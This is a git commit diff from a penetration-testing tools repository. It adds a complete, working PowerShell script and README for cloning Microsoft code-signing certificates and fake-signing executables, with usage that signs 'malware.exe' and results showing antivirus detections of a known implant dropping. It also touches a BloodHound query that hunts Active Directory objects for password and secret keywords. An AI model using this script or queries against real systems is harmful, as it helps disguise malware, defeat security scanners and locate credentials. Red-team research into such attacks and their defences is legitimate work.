Merge branch 'master' of github.com:mgeeky/Penetration-Testing-Tools

red-teaming/Self-Signed Threat/README.md

@@ -0,0 +1,25 @@
+## Code Signing Certificate Cloning Attack 
+
+A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of cloned-certificate sign attacks.
+
+Script was shamelessly borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his research titled:
+- [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec) 
+
+**All credits go to Matt** - this directory contains a copy of his code (_a little tweaked by me_) for preserverance purposes.
+
+
+### Effectiveness
+
+As of [13/07/2022](https://twitter.com/mariuszbit/status/1547320418821980160) this **dumb trick** still gets off the shelf malware evade detection of at least 8 modern security scanners.
+
+| What                                                                         | Result    |
+|------------------------------------------------------------------------------|-----------|
+| Mythic Apollo.exe before fake-signing                                        | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
+| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
+
+### Usage
+
+```
+PS C:\> . .\Sign-Artifact.ps1
+PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
+```

red-teaming/Self-Signed Threat/Sign-Artifact.ps1

@@ -0,0 +1,98 @@
+Function Sign-Artifact {
+    <#
+    .SYNOPSIS
+        Signs input executable file with a faked Microsoft code signing certificate.
+
+    .DESCRIPTION
+        This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
+        and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
+
+        Based on Matt Graeber's implementation:
+            https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+    .EXAMPLE
+        PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
+    #>
+
+    [CmdletBinding()]
+    param(
+        [Parameter(Mandatory=$True)]
+        [string]
+        $InputFile,
+
+        [Parameter(Mandatory=$True)]
+        [string]
+        $OutputFile,
+
+        [switch]
+        $Quiet
+    )
+
+    $Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
+
+    if (-not(Test-Path $InputFile))
+    {
+        Write-Error "[!] Input file does not exist! FilePath: $InputFile"
+        exit 1
+    }
+
+    if(Test-Path $OutputFile)
+    {
+        Remove-Item -Force $OutputFile
+    }
+
+    #
+    # Based on:
+    #    
+    #
+
+    # We'll just store the cloned certificates in current user "Personal" store for now.
+    $CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
+
+    $MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
+    $Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
+
+    $MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
+    $Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
+
+    $MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
+    $Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
+
+
+    # Validate that that $OutputFile is not signed.
+    if($Verbose) 
+    {
+        Write-Host "`n================================================================================================`n[.] Before signing: `n"
+        Get-AuthenticodeSignature -FilePath $InputFile
+    }
+
+    Copy-Item -Force $InputFile $OutputFile | Out-Null
+
+
+    # Sign $OutputFile with the cloned Microsoft leaf certificate.
+    Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
+
+    # The certificate will not properly validate because the root certificate is not trusted.
+
+    # View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
+    # "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
+
+    if($Verbose) 
+    {
+        Write-Host "`n================================================================================================`n[+] After signing: `n"
+        Get-AuthenticodeSignature -FilePath $OutputFile
+    }
+       
+    if(-not $Quiet -or $Verbose)
+    {
+        Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
+    }
+
+    # Save the root certificate to disk and import it into the current user root store.
+    # Upon doing this, the $OutputFile signature will validate properly.
+    # Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
+    # Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
+    # 
+    # # You may need to start a new PowerShell process for the valid signature to take effect.
+    # Get-AuthenticodeSignature -FilePath $FilePath
+}

red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md

@@ -400,7 +400,7 @@ MATCH (o:OU)-[:Contains]->(c) RETURN o.name,o.guid, COUNT(c) ORDER BY COUNT(c) D
 
 - Retrieves nodes having particular juicy keywords in their name or description properties:
 ```
-UNWIND ["admin", "amministratore", "contrase", "empfidlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
+UNWIND ["admin", "amministratore", "contrase", "empfindlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
 ```
 
 - Retrieves nodes that contain UNC paths to SMB shares in their description fields:
@@ -480,4 +480,4 @@ DOMAIN USERS@WINDOMAIN.LOCAL - AdminTo -> SECWWKS1000000.WINDOMAIN.LOCAL - Gener
 
 - Hausec - https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
 - Jeffmcjunkin - https://gist.github.com/jeffmcjunkin/7b4a67bb7dd0cfbfbd83768f3aa6eb12
-- seajaysec - https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d 
+- seajaysec - https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d